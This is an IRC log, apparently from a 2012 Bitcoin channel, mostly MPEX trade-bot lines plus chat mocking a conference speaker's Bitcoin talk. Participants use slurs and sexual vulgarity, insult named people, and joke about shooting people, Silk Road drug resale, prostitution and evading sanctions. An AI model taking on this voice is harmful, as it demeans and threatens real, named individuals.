04:03:55 why ? if you wanted to be in showbiz your best bet would be growing tits and working vegas anyway Dec 05 04:03:59 [MPEX] [S.MPOE] 4321 @ 0.00052385 = 2.2636 BTC [-] Dec 05 04:04:00 [MPEX] [S.MPOE] 13079 @ 0.0005237 = 6.8495 BTC [-] Dec 05 04:04:02 I should just be serial startupping Dec 05 04:04:03 rather than dumbass conference venues. Dec 05 04:04:10 like, marking insane ideas Dec 05 04:04:12 and raising money Dec 05 04:04:15 heh he demonstrates silk road in his presentation Dec 05 04:04:15 and then failing to deliver Dec 05 04:04:25 dude, you'll make 18k a year and work 90 hour weeks. Dec 05 04:04:28 as his first application of bitcoin Dec 05 04:04:43 (as a best case scenario) Dec 05 04:04:46 mircea_popescu: no no no Dec 05 04:04:49 I said fail to deliver Dec 05 04:04:58 they all fail to deliver, this is no innovation. Dec 05 04:05:11 actually delivering something would prolly have everyone fall over. Dec 05 04:05:36 well like Dec 05 04:05:38 look at my language seaking Dec 05 04:05:53 its a C-like language that is very erlangy in thought process Dec 05 04:06:08 a language isn't douchy enough. Dec 05 04:06:13 no but like Dec 05 04:06:18 you need to invent the fuycard. Dec 05 04:06:21 I already know up front Im reinventing lisp at some point Dec 05 04:07:10 then takes a phonecall during his presentation Dec 05 04:07:12 actually i'm publishing this. too much truth content to let it slide. Dec 05 04:07:20 pigeons: it was fucking up the microphone Dec 05 04:07:47 [MPEX] [S.MPOE] 2600 @ 0.00052444 = 1.3635 BTC [+] Dec 05 04:07:55 mircea_popescu: I dunno, I just want to do something that actually improves computing for people Dec 05 04:07:58 to make it vastly less shitty Dec 05 04:08:03 and then retire as a multi-billionare. Dec 05 04:08:13 I have no interest in dumb shit Dec 05 04:08:14 people do not deserve any improvement. let them wallow. Dec 05 04:08:27 dude fuck them Dec 05 04:08:33 if you're doing something do something you need yourself. Dec 05 04:08:34 Im sick of computers Dec 05 04:08:36 they _suck_ Dec 05 04:09:55 [MPEX] [S.MPOE] 1721 @ 0.00052444 = 0.9026 BTC [+] Dec 05 04:09:57 [MPEX] [S.MPOE] 20060 @ 0.00052467 = 10.5249 BTC [+] Dec 05 04:09:58 [MPEX] [S.MPOE] 1135 @ 0.00052472 = 0.5956 BTC [+] Dec 05 04:10:18 ha ha Dec 05 04:10:21 he cant explain how the math works Dec 05 04:17:13 [MPEX] [S.MPOE] 3986 @ 0.00052472 = 2.0915 BTC [+] Dec 05 04:17:14 [MPEX] [S.MPOE] 6664 @ 0.00052482 = 3.4974 BTC [+] Dec 05 04:21:13 [MPEX] [S.MPOE] 1586 @ 0.00052482 = 0.8324 BTC [+] Dec 05 04:21:14 [MPEX] [S.MPOE] 11814 @ 0.00052485 = 6.2006 BTC [+] Dec 05 04:22:45 http://trilema.com/2012/the-conference-freakshow/ there Dec 05 04:25:50 mircea_popescu: you forgot to clip the bitter line Dec 05 04:26:33 haha why clip the bitter! Dec 05 04:26:46 because the bitter was going for a different rant and you sidetracked me Dec 05 04:26:55 a ok Dec 05 04:27:16 said rant: millions of dollars, none of them going to dmc. Dec 05 04:27:20 :< Dec 05 04:27:42 don't feel to bad, inaba lost it when he found out what mpex goes for. Dec 05 04:28:07 you could always invest in james mccarthy's new startup Dec 05 04:28:30 [MPEX] [S.MPOE] 18157 @ 0.00052485 = 9.5297 BTC [+] Dec 05 04:28:55 who? Dec 05 04:29:23 https://www.linkedin.com/in/mccarthyjames Dec 05 04:29:44 [MPEX] [S.MPOE] 3356 @ 0.00052485 = 1.7614 BTC [+] Dec 05 04:29:46 [MPEX] [S.MPOE] 18348 @ 0.000525 = 9.6327 BTC [+] Dec 05 04:29:47 [MPEX] [S.MPOE] 18115 @ 0.00052508 = 9.5118 BTC [+] Dec 05 04:29:56 wait, nefario has a last name?! Dec 05 04:30:07 HE USED TO WORK FOR SUN?! Dec 05 04:30:15 lmao Dec 05 04:30:28 EAT A DICK NEFARIO Dec 05 04:30:28 EAT Dec 05 04:30:29 A Dec 05 04:30:30 DICK Dec 05 04:30:34 yeah, Jim MCDonalds or something like that. Dec 05 04:30:44 kuzetsa: mccarthy Dec 05 04:31:24 at least I didn't say MCHammer Dec 05 04:31:52 ... no, McDonalds was worse :( Dec 05 04:31:54 lol Dec 05 04:32:17 now I'm hungry Dec 05 04:32:26 inb4 he comes back as McBitcoin Dec 05 04:33:12 lol Dec 05 04:33:38 < noagendamarket> you could always invest in james mccarthy's new startup < nameterrific? ;) Dec 05 04:34:12 Telesales executive Dec 05 04:34:15 i like that part. Dec 05 04:34:34 [MPEX] [S.MPOE] 4321 @ 0.00052382 = 2.2634 BTC [-] Dec 05 04:34:35 [MPEX] [S.MPOE] 929 @ 0.0005237 = 0.4865 BTC [-] Dec 05 04:34:36 Software Engineer on the solaris testing team, quite impressive what can i tell you Dec 05 04:35:07 i guess i was a senior software engineer on the blizzard testing team back when wow was in closed beta, right ? Dec 05 04:36:38 fuck that then Dec 05 04:36:57 Im a godlike software tester for both id software and valve on linux. Dec 05 04:37:29 seriously, on my business cards, I use "Deity at large" Dec 05 04:37:32 no software tester is called "business analyst now Dec 05 04:37:38 pigeons: YES Dec 05 04:38:21 [MPEX] [S.MPOE] 5750 @ 0.0005237 = 3.0113 BTC [-] Dec 05 04:38:26 can't i be business vaginist ? Dec 05 04:38:35 analysm doesn't appeal. Dec 05 04:38:43 bwhahah Dec 05 04:40:00 but srsly, i wonder how long does it take to query a db on solaris. Dec 05 04:40:08 2 months cca ? Dec 05 04:44:20 what Dec 05 04:44:21 the Dec 05 04:44:22 fuck Dec 05 04:44:41 lol Dec 05 04:45:05 in other news, http://www.telegraph.co.uk/news/worldnews/europe/netherlands/9719247/Amsterdam-to-create-scum-villages.html Dec 05 04:45:10 fuck genjix in his pimply ass Dec 05 04:45:17 what a fucking toolbag Dec 05 04:45:52 lol Dec 05 04:46:33 putting the worst of society al in one place always works out well... Dec 05 04:46:39 bitcoins are like good cause like were hackers and fings, and silkroad and fing Dec 05 04:46:58 indeed, looking forward to the torching of amsterdam at the hands of the goths Dec 05 04:47:11 someone jumped in and saved him at the end Dec 05 04:47:35 I enjoy watching train wrecks. Dec 05 04:48:01 oh and technology like wikileaks and fings Dec 05 04:48:04 so im making a romanian dicelist, cause apparently romanians are too retarded to have one already Dec 05 04:48:10 my computer has been working hard for once. Dec 05 04:49:01 and internet guns and fings Dec 05 04:49:38 and im really enfusiastic and I would make a demonstration but i dont have bitcoin Dec 05 04:50:05 ahahaha he says that ? Dec 05 04:50:20 yes Dec 05 04:50:42 he could always give a demo about how to survive on noodles and bad cereal Dec 05 04:50:48 then we wonder why people don't take bitcoin seriously. Dec 05 04:51:02 well... if my first contact with bitcoin were something like this i'd still be laughing at you all. Dec 05 04:51:15 you should watch it mircea_popescu Dec 05 04:51:20 bitcoin is like a brick Dec 05 04:51:27 pigeons don't have the energy. Dec 05 04:51:36 dub is hitting the highlights at least Dec 05 04:51:53 genjix could steal from the supermarket really good in that jacket Dec 05 04:52:03 and its based off of maffmatics Dec 05 04:53:07 [MPEX] [S.MPOE] 4321 @ 0.0005248 = 2.2677 BTC [+] Dec 05 04:53:08 [MPEX] [S.MPOE] 3856 @ 0.00052508 = 2.0247 BTC [+] Dec 05 04:53:57 muffmnonix ? Dec 05 04:54:06 I dont think I can watch the questions Dec 05 04:54:55 he doesnt understand bitcoin at all Dec 05 04:55:17 the best thing he can do for bitcoin is shoot himself in the face Dec 05 04:55:20 Homeless people wear green jackets to blend into the plants at night Dec 05 04:55:44 they are just laughing at him Dec 05 04:56:33 a guy in the audience tells people don't laugh, its really complex, if you want to understand about it look on wikipedia Dec 05 04:56:40 computing maffmatical riddles for a small reward and its based on electricity Dec 05 04:58:04 [MPEX] [S.MPOE] 4321 @ 0.00052379 = 2.2633 BTC [-] Dec 05 04:58:05 [MPEX] [S.MPOE] 3142 @ 0.0005237 = 1.6455 BTC [-] Dec 05 04:58:07 [MPEX] [S.MPOE] 22787 @ 0.00052344 = 11.9276 BTC [-] Dec 05 04:58:12 mircea_popescu: you need to watch this, to understand what a complete shitcock he is Dec 05 04:58:39 its unwatcheable Dec 05 04:58:54 haha some random asshole tries to explain it for him, gets it completely wrong and he agrees with them Dec 05 04:59:07 its really hard to watch Dec 05 04:59:11 arbitrage! Dec 05 04:59:24 hahah yeah Dec 05 04:59:29 I havent cringed that much s9ince the last season of big brother uk Dec 05 05:00:14 i had a girl make me a transcript of nefario's speech about two months ago and then i had to give her sick leave the next day. Dec 05 05:00:23 so ever since i've kinda stopped trying. Dec 05 05:01:25 this guy is hundreds of times worse than nefario Dec 05 05:01:40 this video is better Dec 05 05:01:51 you would like this one, i promise Dec 05 05:02:17 I would rather get bowel cancer Dec 05 05:02:21 stop trying to troll me pigeons Dec 05 05:02:55 he is actually retarded Dec 05 05:03:21 i'm really not, this is something you would enjoy Dec 05 05:10:25 yeah mircea_popescu its actually painful to watch, like some kind of s&m thing Dec 05 05:11:36 can you have someone committed to a mental institution ? Dec 05 05:11:48 noagendamarket you have to sue Dec 05 05:12:29 why is someone speaking about bitcoin when they dont have any ? Dec 05 05:12:29 dub no, s&m i enjoy dishing out. this however... Dec 05 05:12:44 noagendamarket begging. Dec 05 05:13:29 he infers pretty strongly that he invented bitcoin Dec 05 05:13:38 where can you contribute to a bounty to have someone get a cream pie thrown in their face Dec 05 05:14:02 ahahah wut Dec 05 05:14:27 he didn't invent bitcoin, zoo thong did Dec 05 05:14:37 I thought tom williams did Dec 05 05:14:46 also, he's a hacker, yes hacker got that hacker, hacker HACKER hacker, that cant switch off a mobile phone Dec 05 05:16:23 "i wrote my own bitcoin" Dec 05 05:16:39 LOL @ calling wikileaks a technology Dec 05 05:16:50 did he also have sex with his own bitcoin? Dec 05 05:17:09 [MPEX] [S.MPOE] 4321 @ 0.0005248 = 2.2677 BTC [+] Dec 05 05:17:10 [MPEX] [S.MPOE] 6479 @ 0.00052508 = 3.402 BTC [+] Dec 05 05:17:11 actually the word technolology is long over due Dec 05 05:17:12 I feel like he just raped my wallet.dat Dec 05 05:17:12 he pulled his own bitcoin Dec 05 05:17:23 you have your bitcoins in your little wallet file on your computer and no one in the world can take them away from you Dec 05 05:17:41 remarkably clueless audience lol Dec 05 05:17:47 "what happened to bitcoinica's ???" Dec 05 05:17:50 someone transcribe it for the forum Dec 05 05:17:59 it'll be fucking hilarious Dec 05 05:18:18 mircea_popescu: cue -pr Dec 05 05:18:49 one of the questioners is trolling him hard Dec 05 05:19:14 she'll get hives and be extra mean to everyoner for a week Dec 05 05:20:54 lol @ going into a room full of bankers and talking about illegal drugs Dec 05 05:21:31 well you can also use it to fund projects that print weapons... Dec 05 05:21:45 yeah and wikileaks and fings Dec 05 05:21:47 you can send bitcoins to iran :P Dec 05 05:22:00 yeah technologies like wikileaks Dec 05 05:22:00 hah I forgot about that Dec 05 05:24:17 if you irretreivably damage your cassacius coin, you can still suck the bitcoin out of it Dec 05 05:24:43 Imagine if intersango ran the bitcoin foundation Dec 05 05:25:03 with bruce wagner Dec 05 05:25:07 lawl Dec 05 05:26:13 and that guy Dec 05 05:26:19 the mybitdaytrades or whatever it was Dec 05 05:26:31 the one rosenfeld didn;t front for Dec 05 05:28:30 genjix will get better with practice :) Dec 05 05:28:58 not really Dec 05 05:29:08 hes getting worse Dec 05 05:29:50 who was the guy who said its like a prime number that there are only 1 million of? Dec 05 05:30:55 at least then people were like, oh ok Dec 05 05:31:37 https://bitcointalk.org/index.php?topic=128998.0;topicseen Dec 05 05:33:29 lol what an idiot Dec 05 05:33:31 prime numbers are made in china Dec 05 05:33:54 I tried to steal from my employer and got fired, suxs Dec 05 05:34:05 [MPEX] [S.MPOE] 8152 @ 0.00052508 = 4.2805 BTC [+] Dec 05 05:34:25 I got more funnies Dec 05 05:34:29 https://bitcoinfoundation.org/blog/ Dec 05 05:35:02 We plan to review proposals on a quarterly basis, with the first grant submission deadline Dec 05 05:35:04 ahahaa WHAT ? Dec 05 05:35:14 dude, somebody needs to explain to gavin what side of the cock he's on. Dec 05 05:36:18 *submits a proposal to buy weed on silk road and resell for profit Dec 05 05:36:40 i'm gonna send one proposal for each btcjam listing Dec 05 05:36:45 [MPEX] [S.MPOE] 4321 @ 0.00052352 = 2.2621 BTC [-] Dec 05 05:36:46 [MPEX] [S.MPOE] 4294 @ 0.00052344 = 2.2477 BTC [-] Dec 05 05:36:59 Brief overview of your proposal: buy 3d printer and materials to print an internet gun and shoot amir with it Dec 05 05:37:08 lol Dec 05 05:37:30 lmao Dec 05 05:37:38 promote bitcoin in iran Dec 05 05:37:48 i've been trying that. iranians are idiots pretty much. Dec 05 05:38:30 Just like to troll the US Dec 05 05:38:38 mircea_popescu: its a big crying match though in -dev jgarzik kicked someone for wanting to promote to iran Dec 05 05:38:57 [MPEX] [S.MPOE] 15119 @ 0.00052344 = 7.9139 BTC [-] Dec 05 05:38:57 eh Dec 05 05:38:58 [MPEX] [S.MPOE] 7750 @ 0.00052307 = 4.0538 BTC [-] Dec 05 05:39:11 my conspiracy theory that there is a dev cabal working to keep bitcoin under ground by promoting scams and retardation is looking more and more likely Dec 05 05:39:25 -dev is kinda like btctalk bneh ? Dec 05 05:39:56 mircea_popescu: http://pastebin.com/taMsQLBN Dec 05 05:40:00 no -dev is actually about dev, they police it well Dec 05 05:41:04 But in particular, it is the height of stupidity to encourage bitcoin use in (a) countries under sanction by the US and Europe Dec 05 05:41:08 he's not very bright is he. Dec 05 05:41:20 agree with jgarzik too, its illegal and that is the public face of bitcoin dev Dec 05 05:41:41 bitcoin dev /= US Dec 05 05:41:46 stupid, unenforced law aside Dec 05 05:42:06 well sha is owned by the US govt Dec 05 05:42:37 i don't grasp the constant need to allign with something or the other. Dec 05 05:42:40 I wiondert why no one boycotts the US Dec 05 05:42:48 and exporting it to embargoed countries is illegal Dec 05 05:42:50 guns Dec 05 05:42:58 "let's not translate this program to iran cause bush doesn't like khomeini" ? wtf is that. Dec 05 05:43:05 should be kicked off foss. Dec 05 05:43:38 if you boycott the US you get called a terrorist lol Dec 05 05:44:22 i think i found a market. debt counseling services for bitcoin Dec 05 05:44:27 https://bitcointalk.org/index.php?topic=128967.0;topicseen Dec 05 05:44:55 theres a strong demand for face punching services Dec 05 05:45:06 the pie throwing was a good idea Dec 05 05:45:35 btw, is there a bitcoin callgirl service yet ? Dec 05 05:46:21 genjix had a teen camgirl service Dec 05 05:46:33 genjix is a pimp Dec 05 05:46:47 camgirl is to callgirl what medieval reenacting is to rape and pillage. Dec 05 05:47:17 but you know, i find it very dubious that silkroad matters if there's not a sex-for-bitcoin thing. Dec 05 05:47:29 if you send bitcoins to a hooker 2 hours beforehand techincally its just 2 adults meeting for sex Dec 05 05:47:30 no matter how you turn it sex is a bigger market. Dec 05 05:47:55 noagendamarket certainly could not make a prostitution case stick as things are now. so... yeah. Dec 05 05:48:20 wait, prostitution is still illegal in places? Dec 05 05:48:25 call it hot wallets lol Dec 05 05:48:47 https://bitcointalk.org/index.php?topic=3066.0 Dec 05 05:48:54 dub iran. Dec 05 05:51:08 I think there was o0nce a brothel that accepted btc Dec 05 05:54:36 [MPEX] [S.MPOE] 4321 @ 0.00051919 = 2.2434 BTC [-] Dec 05 05:54:38 [MPEX] [S.MPOE] 2679 @ 0.00051917 = 1.3909 BTC [-] Dec 05 05:56:06 pigeons: I like nefario's question "how do I get in on this?!" Dec 05 05:57:45 "But really, how do you meet people like this in real life?" Dec 05 06:06:14 i wonder how many of the addresses in the list giga got belong to nefario Dec 05 06:06:37 well i guess it wouldnt help in that case, cause of the process giga is requiring Dec 05 06:23:23 start an underground asset then go running to the government when you hit a snag = profit! Dec 05 06:23:56 I hope the government screws him as badly as anyone who bought shares Dec 05 06:24:02 "it was a legal grey area before, now i know a lawyer" Dec 05 06:24:07 lol Dec 05 06:24:23 in some cases you dont even know that Dec 05 06:25:07 I have to take all your money because i saw a lawyer on the simpsons Dec 05 06:25:18 [MPEX] [S.MPOE] 2331 @ 0.00051956 = 1.2111 BTC [+] Dec 05 06:25:18 [MPEX] [S.MPOE] 14350 @ 0.00051963 = 7.4567 BTC [+] Dec 05 06:25:20 [MPEX] [S.MPOE] 5364 @ 0.00052508 = 2.8165 BTC [+] Dec 05 06:25:58 do lawyers usually advise you to steal all the underground currency you hold ? Dec 05 06:26:06 [MPEX] [S.MPOE] 4321 @ 0.0005192 = 2.2435 BTC [-] Dec 05 06:26:07 [MPEX] [S.MPOE] 5771 @ 0.00051917 = 2.9961 BTC [-] Dec 05 06:26:09 [MPEX] [S.MPOE] 2708 @ 0.00051832 = 1.4036 BTC [-] Dec 05 06:27:39 I am a bad ass except when i actually speak to a lawyer, in which case not Dec 05 06:28:22 [MPEX] [S.MPOE] 4321 @ 0.00052477 = 2.2675 BTC [+] Dec 05 06:28:24 [MPEX] [S.MPOE] 4321 @ 0.00052477 = 2.2675 BTC [+] Dec 05 06:28:25 [MPEX] [S.MPOE] 4321 @ 0.00052479 = 2.2676 BTC [+] Dec 05 06:28:26 [MPEX] [S.MPOE] 1837 @ 0.00052479 = 0.964 BTC [+] Dec 05 06:30:49 http://www.encyclopediabitcoinica.com/wiki/Lawyer Dec 05 06:33:25 I wonder if cryptostocks or mpex shut down would the owners even get a scammer tag unless theymos owned shares in them Dec 05 06:35:07 mpex can shut down orderly, what's the problem. Dec 05 06:35:18 [MPEX] [S.MPOE] 3950 @ 0.00052473 = 2.0727 BTC [-] Dec 05 06:35:33 shut down? or shut down and over a month later hasn't given the btc or asset info? Dec 05 06:36:39 I mean bitcoinica still hasnt returbned funds Dec 05 06:37:04 why do to operators still not have tags Dec 05 06:41:59 [MPEX] [S.MPOE] 371 @ 0.00052473 = 0.1947 BTC [-] Dec 05 06:42:00 [MPEX] [S.MPOE] 2484 @ 0.00052479 = 1.3036 BTC [+] Dec 05 06:42:02 [MPEX] [S.MPOE] 24595 @ 0.00052508 = 12.9143 BTC [+] Dec 05 06:43:53 [MPEX] [S.MPOE] 7450 @ 0.00052099 = 3.8814 BTC [-] Dec 05 06:45:49 http://trilema.com/2012/romanian-dicelist/ romanian dicelist if anyone cares. Dec 05 06:47:54 [MPEX] [S.MPOE] 1653 @ 0.00052099 = 0.8612 BTC [-] Dec 05 06:47:55 [MPEX] [S.MPOE] 5289 @ 0.00052508 = 2.7771 BTC [+] Dec 05 06:47:57 [MPEX] [S.MPOE] 5558 @ 0.00052512 = 2.9186 BTC [+] Dec 05 07:06:24 [MPEX] [S.MPOE] 4321 @ 0.00051843 = 2.2401 BTC [-] Dec 05 07:06:25 [MPEX] [S.MPOE] 4595 @ 0.00051832 = 2.3817 BTC [-] Dec 05 07:10:07 [MPEX] [S.MPOE] 4321 @ 0.00051834 = 2.2397 BTC [+] Dec 05 07:10:08 [MPEX] [S.MPOE] 17204 @ 0.00051832 = 8.9172 BTC [-] Dec 05 07:10:10 [MPEX] [S.MPOE] 15775 @ 0.00051822 = 8.1749 BTC [-] Dec 05 07:10:54 [MPEX] [S.MPOE] 4321 @ 0.00051975 = 2.2458 BTC [+] Dec 05 07:10:55 [MPEX] [S.MPOE] 14329 @ 0.00051988 = 7.4494 BTC [+] Dec 05 07:14:47 [MPEX] [S.MPOE] 4321 @ 0.00051963 = 2.2453 BTC [-] Dec 05 07:14:49 [MPEX] [S.MPOE] 4821 @ 0.00051988 = 2.5063 BTC [+] Dec 05 07:14:50 [MPEX] [S.MPOE] 10778 @ 0.00052512 = 5.6597 BTC [+] Dec 05 07:14:51 [MPEX] [S.MPOE] 15030 @ 0.00052526 = 7.8947 BTC [+] Dec 05 07:15:33 [MPEX] [S.MPOE] 8370 @ 0.00052526 = 4.3964 BTC [+] Dec 05 07:15:35 [MPEX] [S.MPOE] 4428 @ 0.00052541 = 2.3265 BTC [+] Dec 05 07:15:35 [MPEX] [S.MPOE] 13100 @ 0.00052557 = 6.885 BTC [+] Dec 05 07:15:36 [MPEX] [S.MPOE] 3133 @ 0.00052559 = 1.6467 BTC [+] Dec 05 07:19:48 [MPEX] [S.MPOE] 14790 @ 0.00052559 = 7.7735 BTC [+] Dec 05 07:19:50 [MPEX] [S.MPOE] 15704 @ 0.00052564 = 8.2547 BTC [+] Dec 05 07:24:04 [MPEX] [S.DICE] 3500 @ 0.00332634 = 11.6422 BTC [+] Dec 05 07:36:16 [MPEX] [S.MPOE] 22200 @ 0.00052004 = 11.5449 BTC [-] Dec 05 07:47:52 [MPEX] [S.MPOE] 2096 @ 0.00052564 = 1.1017 BTC [+] Dec 05 07:47:53 [MPEX] [S.MPOE] 14378 @ 0.00052566 = 7.5579 BTC [+] Dec 05 07:47:55 [MPEX] [S.MPOE] 4176 @ 0.00052567 = 2.1952 BTC [+] Dec 05 07:49:32 [MPEX] [S.MPOE] 2700 @ 0.00052004 = 1.4041 BTC [-] Dec 05 07:49:34 [MPEX] [S.MPOE] 9775 @ 0.00051822 = 5.0656 BTC [-] Dec 05 07:49:34 [MPEX] [S.MPOE] 275 @ 0.00051742 = 0.1423 BTC [-] Dec 05 08:02:51 [MPEX] [S.MPOE] 8024 @ 0.00052567 = 4.218 BTC [+] Dec 05 08:02:52 [MPEX] [S.MPOE] 13650 @ 0.00052569 = 7.1757 BTC [+] Dec 05 08:02:53 [MPEX] [S.MPOE] 9800 @ 0.00052573 = 5.1522 BTC [+] Dec 05 08:02:54 [MPEX] [S.MPOE] 3576 @ 0.00052576 = 1.8801 BTC [+] Dec 05 08:06:41 [MPEX] [S.DICE] 2350 @ 0.00332634 = 7.8169 BTC [+] Dec 05 08:13:34 [MPEX] [S.MPOE] 15924 @ 0.00052576 = 8.3722 BTC [+] Dec 05 08:13:35 [MPEX] [S.MPOE] 4676 @ 0.00052606 = 2.4599 BTC [+] Dec 05 08:26:13 [MPEX] [S.MPOE] 4321 @ 0.00051757 = 2.2364 BTC [-] Dec 05 08:26:15 [MPEX] [S.MPOE] 13906 @ 0.00051742 = 7.1952 BTC [-] Dec 05 08:26:16 [MPEX] [S.MPOE] 6397 @ 0.00051739 = 3.3097 BTC [-] Dec 05 08:43:15 [MPEX] [S.MPOE] 8050 @ 0.00052137 = 4.197 BTC [+] Dec 05 08:43:16 [MPEX] [S.MPOE] 4321 @ 0.00051762 = 2.2366 BTC [-] Dec 05 08:43:18 [MPEX] [S.MPOE] 11609 @ 0.00051739 = 6.0064 BTC [-] Dec 05 08:43:59 [MPEX] [S.MPOE] 7450 @ 0.00052198 = 3.8888 BTC [+] Dec 05 08:44:01 [MPEX] [S.MPOE] 4321 @ 0.00052575 = 2.2718 BTC [+] Dec 05 08:44:02 [MPEX] [S.MPOE] 18329 @ 0.00052606 = 9.6422 BTC [+] Dec 05 09:05:15 [MPEX] [S.DICE] 175 @ 0.00332634 = 0.5821 BTC [+] Dec 05 09:05:17 [MPEX] [S.DICE] 1050 @ 0.00326961 = 3.4331 BTC [-] Dec 05 09:05:18 [MPEX] [S.DICE] 1277 @ 0.00323801 = 4.1349 BTC [-] Dec 05 09:06:22 [MPEX] [S.MPOE] 4321 @ 0.00052172 = 2.2544 BTC [-] Dec 05 09:06:23 [MPEX] [S.MPOE] 25479 @ 0.00052147 = 13.2865 BTC [-] Dec 05 09:11:06 [MPEX] [S.MPOE] 4321 @ 0.00052592 = 2.2725 BTC [+] Dec 05 09:11:08 [MPEX] [S.MPOE] 8929 @ 0.00052606 = 4.6972 BTC [+] Dec 05 09:13:30 [MPEX] [S.MPOE] 4321 @ 0.00052172 = 2.2544 BTC [-] Dec 05 09:13:31 [MPEX] [S.MPOE] 2171 @ 0.00052147 = 1.1321 BTC [-] Dec 05 09:13:32 [MPEX] [S.MPOE] 13800 @ 0.00052082 = 7.1873 BTC [-] Dec 05 09:13:33 [MPEX] [S.MPOE] 4694 @ 0.00051739 = 2.4286 BTC [-] Dec 05 09:13:34 [MPEX] [S.MPOE] 1514 @ 0.00051721 = 0.7831 BTC [-] Dec 05 09:14:20 [MPEX] [S.MPOE] 15586 @ 0.00051721 = 8.0612 BTC [-] Dec 05 09:14:21 [MPEX] [S.MPOE] 4289 @ 0.00051618 = 2.2139 BTC [-] Dec 05 09:14:22 [MPEX] [S.MPOE] 3740 @ 0.00051618 = 1.9305 BTC [-] Dec 05 09:23:03 [MPEX] [S.MPOE] 4321 @ 0.00052605 = 2.2731 BTC [+] Dec 05 09:23:04 [MPEX] [S.MPOE] 571 @ 0.00052606 = 0.3004 BTC [+] Dec 05 09:23:06 [MPEX] [S.MPOE] 12395 @ 0.00052606 = 6.5205 BTC [+] Dec 05 09:23:07 [MPEX] [S.MPOE] 12613 @ 0.00052612 = 6.636 BTC [+] Dec 05 10:02:41 [MPEX] [S.MPOE] 850 @ 0.0005247 = 0.446 BTC [-] Dec 05 10:04:21 [MPEX] [S.MPOE] 3471 @ 0.0005247 = 1.8212 BTC [-] Dec 05 10:04:22 [MPEX] [S.MPOE] 13400 @ 0.00052488 = 7.0334 BTC [+] Dec 05 10:04:23 [MPEX] [S.MPOE] 5733 @ 0.00052596 = 3.0153 BTC [+] Dec 05 10:06:59 [MPEX] [S.MPOE] 4321 @ 0.00051802 = 2.2384 BTC [-] Dec 05 10:07:00 [MPEX] [S.MPOE] 10929 @ 0.00051796 = 5.6608 BTC [-] Dec 05 10:16:05 [MPEX] [S.MPOE] 4321 @ 0.000518 = 2.2383 BTC [+] Dec 05 10:16:06 [MPEX] [S.MPOE] 8121 @ 0.00051796 = 4.2064 BTC [-] Dec 05 10:16:07 [MPEX] [S.MPOE] 4193 @ 0.00051618 = 2.1643 BTC [-] Dec 05 10:20:33 [MPEX] [S.MPOE] 7816 @ 0.00051618 = 4.0345 BTC [-] Dec 05 10:20:34 [MPEX] [S.MPOE] 15141 @ 0.00051547 = 7.8047 BTC [-] Dec 05 10:20:36 [MPEX] [S.MPOE] 26286 @ 0.00051503 = 13.5381 BTC [-] Dec 05 10:21:30 goddamn hangover Dec 05 10:34:34 [MPEX] [S.MPOE] 5700 @ 0.00051503 = 2.9357 BTC [-] Dec 05 10:47:14 [MPEX] [S.MPOE] 1586 @ 0.00051503 = 0.8168 BTC [-] Dec 05 10:47:14 [MPEX] [S.MPOE] 9964 @ 0.00051433 = 5.1248 BTC [-] Dec 05 11:02:44 [MPEX] [S.MPOE] 4321 @ 0.00052028 = 2.2481 BTC [+] Dec 05 11:02:45 [MPEX] [S.MPOE] 4321 @ 0.00052054 = 2.2493 BTC [+] Dec 05 11:02:46 [MPEX] [S.MPOE] 4658 @ 0.00052058 = 2.4249 BTC [+] Dec 05 11:07:52 [MPEX] [S.MPOE] 4321 @ 0.00051447 = 2.223 BTC [-] Dec 05 11:07:53 [MPEX] [S.MPOE] 32468 @ 0.00051433 = 16.6993 BTC [-] Dec 05 11:09:31 [MPEX] [S.MPOE] 4321 @ 0.00051446 = 2.223 BTC [+] Dec 05 11:09:32 [MPEX] [S.MPOE] 6851 @ 0.00051433 = 3.5237 BTC [-] Dec 05 11:09:33 [MPEX] [S.MPOE] 5876 @ 0.00051431 = 3.0221 BTC [-] Dec 05 11:20:53 [MPEX] [S.MPOE] 22581 @ 0.00051488 = 11.6265 BTC [+] Dec 05 11:20:55 [MPEX] [S.MPOE] 23209 @ 0.00051431 = 11.9366 BTC [-] Dec 05 11:22:33 [MPEX] [S.MPOE] 5515 @ 0.00051431 = 2.8364 BTC [-] Dec 05 11:22:34 [MPEX] [S.MPOE] 735 @ 0.00051375 = 0.3776 BTC [-] Dec 05 11:26:11 [MPEX] [S.MPOE] 12271 @ 0.00051375 = 6.3042 BTC [-] Dec 05 11:26:13 [MPEX] [S.MPOE] 5038 @ 0.00051372 = 2.5881 BTC [-] Dec 05 11:29:57 [MPEX] [S.MPOE] 21744 @ 0.00051372 = 11.1703 BTC [-] Dec 05 11:29:58 [MPEX] [S.MPOE] 16906 @ 0.00051371 = 8.6848 BTC [-] Dec 05 11:47:06 [MPEX] [S.MPOE] 17750 @ 0.00051818 = 9.1977 BTC [+] Dec 05 11:49:59 [MPEX] [S.MPOE] 4321 @ 0.00052054 = 2.2493 BTC [+] Dec 05 11:50:00 [MPEX] [S.MPOE] 4242 @ 0.00052058 = 2.2083 BTC [+] Dec 05 11:50:02 [MPEX] [S.MPOE] 12600 @ 0.0005206 = 6.5596 BTC [+] Dec 05 11:50:03 [MPEX] [S.MPOE] 17237 @ 0.00052446 = 9.0401 BTC [+] Dec 05 12:00:39 [MPEX] [S.MPOE] 4321 @ 0.00052427 = 2.2654 BTC [-] Dec 05 12:00:40 [MPEX] [S.MPOE] 6079 @ 0.00052446 = 3.1882 BTC [+] Dec 05 12:06:25 [MPEX] [S.MPOE] 16196 @ 0.00052206 = 8.4553 BTC [-] Dec 05 12:13:19 [MPEX] [S.MPOE] 4321 @ 0.00052164 = 2.254 BTC [-] Dec 05 12:13:20 [MPEX] [S.MPOE] 25350 @ 0.00052138 = 13.217 BTC [-] Dec 05 12:20:07 [MPEX] [S.MPOE] 229 @ 0.00052019 = 0.1191 BTC [-] Dec 05 12:20:09 [MPEX] [S.MPOE] 9745 @ 0.00052206 = 5.0875 BTC [+] Dec 05 12:31:32 [MPEX] [S.MPOE] 4321 @ 0.00051864 = 2.241 BTC [-] Dec 05 12:31:33 [MPEX] [S.MPOE] 26420 @ 0.0005185 = 13.6988 BTC [-] Dec 05 12:31:34 [MPEX] [S.MPOE] 2559 @ 0.00051818 = 1.326 BTC [-] Dec 05 12:42:26 [MPEX] [S.DICE] 1307 @ 0.00321357 = 4.2001 BTC [-] Dec 05 12:45:24 [MPEX] [S.MPOE] 15191 @ 0.00051818 = 7.8717 BTC [-] Dec 05 12:45:25 [MPEX] [S.MPOE] 15184 @ 0.00051759 = 7.8591 BTC [-] Dec 05 12:56:30 [MPEX] [S.MPOE] 1397 @ 0.00052204 = 0.7293 BTC [+] Dec 05 12:57:24 http://imgur.com/7Hwte 